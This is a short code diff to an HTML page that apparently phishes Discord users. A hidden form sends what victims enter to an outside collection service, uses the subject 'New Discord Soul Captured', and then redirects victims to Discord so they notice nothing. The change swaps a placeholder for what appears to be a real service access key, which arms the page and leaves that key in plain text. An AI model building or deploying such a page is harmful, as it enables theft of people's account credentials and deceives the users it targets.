--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
         <!-- The Form is armed. It points to our collection service. -->
         <form action="https://api.web3forms.com/submit" method="POST">
             <!-- IMPORTANT: REPLACE "YOUR_ACCESS_KEY" with your actual Web3Forms access key -->
-            <input type="hidden" name="access_key" value="YOUR_ACCESS_KEY">
+            <input type="hidden" name="access_key" value="9089e610-3976-43fe-b581-a4261c93fa73">
             <input type="hidden" name="subject" value="New Discord Soul Captured">
             <input type="hidden" name="from_name" value="Serpent Bot">
             <input type="hidden" name="redirect" value="https://discord.com/app"> <!-- Redirects them after submission -->
